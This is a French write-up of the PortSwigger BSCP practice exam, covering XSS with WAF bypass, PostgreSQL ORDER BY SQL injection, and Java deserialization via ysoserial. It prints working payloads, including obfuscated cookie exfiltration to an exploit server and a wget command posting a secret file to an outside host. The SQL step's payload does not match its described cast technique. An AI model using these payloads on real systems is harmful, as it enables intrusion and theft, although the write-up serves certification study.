WRITEUP : PRACTICE EXAM 1 (BSCP)

Practice Exam - Burp Suite Certified Practitioner | Web Security Academy - PortSwiggerWebSecAcademy

Stage 1: Initial Access (Cross-Site Scripting - XSS)

Cible : Panel de recherche. Vecteur : Injection de JavaScript via le DOM au sein d'un objet JSON.

1. Analyse du point d'injection

Le terme de recherche est réfléchi dans une variable JavaScript :

var searchResultsObj = {"results":[],"searchTerm":"test"}

"};alert(1);//

2. Bypass du WAF & Exfiltration

L'utilisation directe de document.cookie déclenche le WAF ("Potentially dangerous search term"). Pour contourner cela, on utilise l'encodage hexadécimal/unicode ou la fonction with.

Payload de test (Bypass) :

"};alert(document['\x63\x6f\x6f\x6b\x69\x65']);//
"};alert(document['\u0063\u006f\u006f\u006b\u0069\u0065']);//
"};with(document)alert(cookie);//

Payload final (Exfiltration via Collaborator) :

On utilise eval(atob(...)) pour masquer la requête fetch vers notre serveur d'exploit.

"};eval(atob('ZmV0Y2goJ2h0dHBzOi8vZXhwbG9pdC0wYWVjMDBmMjA0NWI1ZDUzODMwMDg3YWMwMWVlMDA3Zi5leHBsb2l0LXNlcnZlci5uZXQvbG9nP2M9Jytkb2N1bWVudC5jb29raWUp'));//

3. Exploit final (Livré à la victime)

Le script redirige la victime vers l'URL malveillante contenant le payload injecté :

<script>
location='https://0a5c00b104455dae835b889200d50093.web-security-academy.net/?SearchTerm=%22};eval(atob(%27ZmV0Y2goJ2h0dHBzOi8vZXhwbG9pdC0wYWVjMDBmMjA0NWI1ZDUzODMwMDg3YWMwMWVlMDA3Zi5leHBsb2l0LXNlcnZlci5uZXQvbG9nP2M9Jytkb2N1bWVudC5jb29raWUp%27));//'
</script>

Stage 2: Privilege Escalation (SQL Injection)

Vecteur : Injection SQL dans le paramètre ORDER BY

1. Identification de la base de données

L'erreur générée par une chaîne non fermée confirme une injection possible. On teste les payloads de délai (Time-based) pour identifier le moteur :

PostgreSQL (Cible) : DATE,pg_sleep(10)
Erreur rencontrée : could not identify an ordering operator for type void.
- Cause : pg_sleep() retourne void, ce qui ne peut pas être trié par ORDER BY.

2. Extraction de données (Error-based)

Pour extraire le mot de passe de l'administrateur, on force une erreur de conversion de type (Cast) pour afficher la donnée dans le message d'erreur.

Payload : DATE,(CASE WHEN (1=1) THEN (SELECT 'a' FROM pg_sleep(10)) ELSE 'a' END)

Résultat : L'erreur révèle le mot de passe : invalid input syntax for type integer: "b235d711d5858825"

Stage 3: File System Access (Java Deserialization)

Objectif : Accéder au système de fichiers (exfiltration du fichier secret).

Cookie: admin-prefs=H4sIAAAAAAAA%2fzWPPU7DQBCFF0RSQcMJpkOi2PTQEH4iCkcKClJEOV6Pk8HrHbO7dmKQOA4VJ%2bAI3IU7sBahm%2fn09PS9zx81Cl6dW8w1msjigjZS1%2bJ0IM9o%2bRVzS3pa1OwWnsrw9vUxDqvv7FAdZeq4xE48R5qJFFGdZs%2fY4cSiW0%2bW0bNbX2bq5D%2fz0EqkF%2fWuDvawHei1SLWHo7ih%2bi%2bxa6Iab5kc%2baiu5j04rAk4wA16KwHm4qL0qOFJWqjYWiqg7qHEVOE1JNMGPUEUKJh0VIvHDcGKcpg2jWWDw1K4R1ORPwvpcEWePC7gloORjgZ1SBDudo0VjsO7JDMI9zCzuA1JT3zaSb9PDWuHQgEAAA%3d%3d

Une fois connecté en admin, on observe le cookie admin-prefs.

Format : URL Encoded -> Base64 -> Gzip -> Objet Java sérialisé.

2. Exploitation (Ysoserial)

L'application utilise une bibliothèque vulnérable (CommonsCollections). Après test des différentes versions (1 à 8), la version CommonsCollections6 est fonctionnelle.

3. Payload d'exfiltration

On génère un payload pour envoyer le contenu du fichier /home/carlos/secret vers notre serveur Collaborator via une requête POST :

CommonsCollections6 '/usr/bin/wget --post-file /home/carlos/secret https://xnoho8l20pznclvof0aaw7ysjjpad01p.oastify.com'

Procédure : Compresser le binaire en Gzip -> Encoder en Base64 -> Remplacer la valeur dans le cookie admin-prefs.

Mis à jour il y a 7 jours

hashtagStage 1: Initial Access (Cross-Site Scripting - XSS)

hashtag1. Analyse du point d'injection

hashtag2. Bypass du WAF & Exfiltration

hashtag3. Exploit final (Livré à la victime)

hashtagStage 2: Privilege Escalation (SQL Injection)

hashtag1. Identification de la base de données

hashtag2. Extraction de données (Error-based)

hashtagStage 3: File System Access (Java Deserialization)

hashtag1. Analyse de la Cookie

hashtag2. Exploitation (Ysoserial)

hashtag3. Payload d'exfiltration